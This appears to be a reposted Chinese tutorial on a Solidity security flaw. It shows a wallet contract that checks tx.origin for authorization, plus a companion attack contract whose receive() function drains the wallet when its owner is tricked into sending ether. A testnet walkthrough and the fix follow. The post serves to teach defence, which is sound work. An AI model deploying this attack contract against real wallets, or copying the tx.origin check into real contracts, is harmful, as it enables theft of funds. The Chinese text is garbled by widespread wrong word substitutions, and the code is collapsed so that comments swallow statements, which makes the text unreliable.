关于区块链:区块链合约安全系列一公链合约权限校验引发的严重安全问题

id:BSN_2021
公众号：BSN研习社

背景：因为公链环境下所有的信息都是共享的，智能合约相当于是通明的，任何人只需晓得其地址就能够调用外部的办法，所以开发者在开发合约时，逻辑判断个别会增加一下权限的校验，以进步其安全性。然而有时候对其理解不深，会带来一些潜在的暗藏bug。

指标：验证当合约外部应用 tx.origin 做权限校验时，攻击者能够绕过逻辑束缚进行资金盗取。

对象：实用于用Solidity语言开发的智能合约，例如BSN中的武汉链(基于ETH）和泰安链（基于 fisco bcos）上运行的智能合约。

环境筹备
•两个合约文件，一个为用户钱包合约（TxUserWallet ），另一个为攻打钱包合约（TxAttackWallet ）。
•两个账户，别离为以上两个合约的owner。预制为 TxUserWallet owner:

0xAa1a88aa89F50ee9B7e3F6124f18a31d5E6dB1F9

TxAttackWallet owner:

0x5adaCf91A3C4e9a7541f0dA89dC575354C075941

合约文件_TxUserWallet.sol_如下图所示：

// SPDX-License-Identifier: GPL-3.0pragma solidity >=0.7.0 <0.9.0;// THIS CONTRACT CONTAINS A BUG - DO NOT USEcontract TxUserWallet {    address owner;    event Deposit(uint256 balance);    constructor() payable {        owner = msg.sender;    }    function supplyFunds() payable public {        emit Deposit(msg.value);    }    function transferTo(address payable dest, uint amount) public {        // THE BUG IS RIGHT HERE, you must use msg.sender instead of tx.origin        require(tx.origin == owner);        dest.transfer(amount);    }    function balanceOf() public view returns(uint){        return address(this).balance;    }    function withdraw() public {       payable(owner).transfer(address(this).balance);    }}

合约文件_TxAttackWallet.sol_如下图所示：

// SPDX-License-Identifier: GPL-3.0pragma solidity >=0.7.0 <0.9.0;interface TxUserWallet {     function transferTo(address payable dest, uint amount) external;}contract TxAttackWallet {    address payable owner;    TxUserWallet userWallet;    constructor(TxUserWallet userWalletAddr) {        owner = payable(msg.sender);        userWallet = userWalletAddr;    }    function balanceOf() public view returns(uint){        return address(this).balance;    }    receive() external payable {        userWallet.transferTo(owner, address(userWallet).balance);    }}

合约部署
应用remix别离部署两个合约
1.部署合约TxUserWallet的过程截图

合约部署胜利的截图如下

2. 部署合约TxAttackWallet 的过程截图
   留神：部署的时候须要将“用户钱包合约的地址”进行预制，用于后续攻打时应用。
   
   合约部署胜利的截图如下
   
   攻打测试
   攻打原理为诱骗合约TxUserWallet的owner对合约TxAttackWallet进行转账操作。因为技术受骗合约TxAttackWallet承受ether时会触发receive()办法，从而进行对TxUserWallet合约进行盗取ether。

为不便做比照，咱们在转账操作之前先截图一下用户钱包合约以及攻打合约的owner的账户余额


当初应用TxUserWallet 的owner账户对合约TxAttackWallet进行转账操作。即 应用账户0xAa1a88aa89F50ee9B7e3F6124f18a31d5E6dB1F9向合约账户0xB50cF0e11aA2dA0F4f0E95841a4F1514F81015fd转账0.001（金额任意）。

转账交易记录 https://ropsten.etherscan.io/...

转账操作胜利后，咱们来查看一下TxUserWallet领有的0.00002 Ether是否被盗取了，截图如下

上图能够看出余额已变为零，接下来看一下TxAttackWallet的owner账户余额，截图如下

上图能够发现一笔0.00002 Ether转账记录，同时对比余额变动，至此已盗取胜利。

论断
综上发现，当咱们应用tx.origin做校验时，失去的是_交易原始签名地址而不是攻打合约的地址_，从而绕过了业务束缚逻辑，将所有资金进行了转移操作。

另外，那如何进行修复呢？只须要将tx.origin改为msg.sender去做校验即可。有趣味的能够试一下。